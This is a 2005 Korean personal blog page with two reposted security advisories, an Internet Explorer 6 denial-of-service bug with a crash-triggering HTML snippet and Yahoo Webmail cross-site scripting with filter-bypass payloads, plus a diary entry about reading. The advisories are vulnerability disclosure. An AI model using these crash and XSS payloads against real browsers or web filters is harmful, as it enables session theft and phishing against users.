2005. 11. 15. 09:29
Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service

A denial of service vulnerability exists within Internet Explorer 6.0 on XP SP2 with the J2SE Runtime Environment installed allows for an attacker to cause the browser to stop responding. Please read more for the full details.

digg it!




Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service

Release Date:
October 24, 2005

Date Reported:
August 14, 2005

Severity:
Medium

Vendor:
Microsoft

Versions Affected:
Internet Explorer 6.0 on Windows XP SP2

Overview:
A denial of service vulnerability exists within Internet Explorer 6.0 on XP SP2 with the J2SE Runtime Environment installed allows for an attacker to cause the browser to stop responding.

Technical Details:
The flaw is within mshtmled.dll (6.00.2900.2753 (xpsp_sp2_gdr.050902-1326) and prior versions) which Internet Explorer 6.0 uses for HTML editing. Below is a snippet from mshtmled.dll which is causing the problem. From what is looks like, this is just a null pointer issue.

.text:76235680 loc_76235680: ; CODE XREF: sub_762355EC+56 j
.text:76235680 ; sub_762355EC+62 j ...
.text:76235680 mov eax, [esi+8]
.text:76235683 lea ecx, [eax+10h]
.text:76235686 mov eax, [ecx] ; <(=--- oops
.text:76235688 call dword ptr [eax+0Ch]
.text:7623568B mov ecx, [eax]

The following code below will reproduce this issue. Please note that you must have J2SE Runtime Environment installed which is located here:

http://www.java.com/en/download/windows_automatic.jsp

<'FRAMESET >
<'FRAME SRC=AAAA >
<'EMBED NAME=SP STYLE= >
<'APPLET HSPACE=file://AAAA >

Obviously just remove the '.

Vendor Status:
Ask Microsoft.

Discovered by:
Tom Ferris

Related Links:
http://www.security-protocols.com/poc/sp-x20.html
http://www.security-protocols.com/advisory/sp-x20-advisory.txt
http://www.evolvesecurity.com

'Hobby > Computer' 카테고리의 다른 글

Server Push  (0) 2005.11.15
Zeroboard 4.x "preg_replace" Remote Command Execution Exploit  (2) 2005.11.15
Yahoo Webmail Vulnerabilty  (0) 2005.11.15
사이버독도사건  (1) 2005.10.28
W.S. #00  (0) 2005.10.27
Posted by 아즈키
2005. 11. 15. 09:22

SEC-CONSULT Security Advisory 20051021-0
=========================================
title: Yahoo/MSIE XSS
program: Yahoo Webmail in combination with MSIE 6.0
(maybe other browsers)
homepage: www.yahoo.com
found: 2005-04
by: SEC-Team / SEC-CONSULT / www.sec-consult.com
=========================================

Vulnerabilty overview:
---------------

Since april 2005 SEC-Consult has found 5+ serious vulnerabilities within Yahoo's webmail systems.
All of them have been fixed in the production environment. Nevertheless SEC-Consult believes that
input-validation thru blacklists can just be a temporary solution to problems like this. From our
point of view there are many other applications vulnerable to this special type of problem where
vulnerabilities of clients and servers can be combined.

Vulnerabilty details:
---------------

1) XSS / Cookie-Theft

Yahoos blacklists fail to detect script-tags in combination with special characters like NULL-Bytes and other META-Characters.
This leaves Webmail users using MSIE vulnerable to typical XSS / Relogin-trojan / Phishing attacks.

2) Some XSS Examples from our advisories

Excerpt from HTML-mails:

=========================================
SCRIPT-TAG:
---cut here---
<h1>hello</h1><s[META-Char]cript>alert("i have you now")</s[META-Char]cript></br>rrrrrrxxxxx<br>
---cut here---
=========================================
OBJECT-TAG:
---cut here---
<objec[META-Char]t classid="CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000">
<param name="movie" value="http://[somewhere]/yahoo.swf"></obje[META-Char]ct>
---cut here---
=========================================
ONERROR-Attribute:
---cut here---
<img src="http://dontexist.info/x.jpg" one[META-Char]rror="alert('i have you now')">uargg</p>
---cut here---
=========================================
ONUNLOAD-Attribute:
---cut here---
</body><body onun[META-Char]load=alert('i have you now')><br></br><p>somewords</p></body></html>
---cut here---
=========================================


Recommended hotfixes for webmail-users
---------------

Do not use MS Internet-Explorer.


Recommended fixes
---------------

Do not use blacklists on tags and attributes. Whitelist special/meta-characters.


Vendor status:
---------------
Vulnerabilities have been fixed.


General remarks
---------------
We would like to apologize in advance for potential nonconformities and/or known issues.

~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC-Team / www.sec-consult.com /

'Hobby > Computer' 카테고리의 다른 글

Zeroboard 4.x "preg_replace" Remote Command Execution Exploit  (2) 2005.11.15
Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service  (0) 2005.11.15
사이버독도사건  (1) 2005.10.28
W.S. #00  (0) 2005.10.27
Character Recognition  (0) 2005.08.17
Posted by 아즈키
2005. 11. 14. 23:03
11월 중순.. '-'

오늘은 누군가의 생일이고, // 종훈이형 생일 추카해^^//

또 누군가에게는 최악의 날이였겠지..

나에겐 그냥 평범했지만 그닥 좋지는 않은 하루였었다

한시간 남짓 남은 오늘이 아쉬웠던가보다

들어 가서 쉬라는 누군가의 조언도..

힘들어하는 나의 몸뚱아리도 신경을 쓰지않고 버티고있다

아마도 수다.. 수다를 너무 떨고 싶은 것일까

쫓기는듯한 기분이 든다.. 뭔가 하지 않으면 그냥 멈춰버릴꺼 같은 기분...

할수가 없다 아무것도... 그래서 이글을 쓰는 수밖에 없다 아마도..



지나가면서 이런 저런 생각을 한다.

그리고 가끔씩은 정말로 너무 쓰고싶었던 생각들이 정리가된다..

하지만 그게 무엇이였는지도 기억이 나질 않는다..

건망증.. 나의 한계는 그정도.. 수첩이 필요할듯 싶다.

그럴싸하게 뭔가 지어낸 대사 몇마디조차 기억 나질않아서..

개성도 없고 감정만 앞선 글을 적어나간다

아니, 생각의 토막을 그냥 옮겨놓을 뿐이지..



문학. 요새 재미가 붙어버린 퀘스트

한동안 많이 멀어졌었지.. 나의 관심은 다른곳에 있었으니까

대학 2년 동안 적어도 200권이 넘는 책을 접했다

그중 문학이란건 두세권이 될려나 모를정도라면?

그렇다 그정도로 나는 미쳐있었다 -_-

요새는 반대로 그 미쳤던 책들을 읽은 기억이없다.

난 TCP/IP의 개념을 파악하는 대신에 '파트리트 쥐스킨트' 라는 사람을 알게 되었고..

그사람의 깊이는 내가 좋아할만한 것이란 것도 알게되었다 // 포우 만큼은 아니였지만

주변이 농담하듯 말하는 나의 음침함-나는 이것을 슬픔이라고 칭하고있다-하고 맞는다

내가 느끼는 '깊이'라는건 슬픔이거나 공포 정도의 감정. (혹은 자존심 관련)

'Privacy > Real' 카테고리의 다른 글

새로움  (2) 2005.11.17
머그컵  (4) 2005.11.17
위대한 캣츠비  (0) 2005.11.14
azki's personality #11  (0) 2005.11.14
Chess..  (1) 2005.11.13
Posted by 아즈키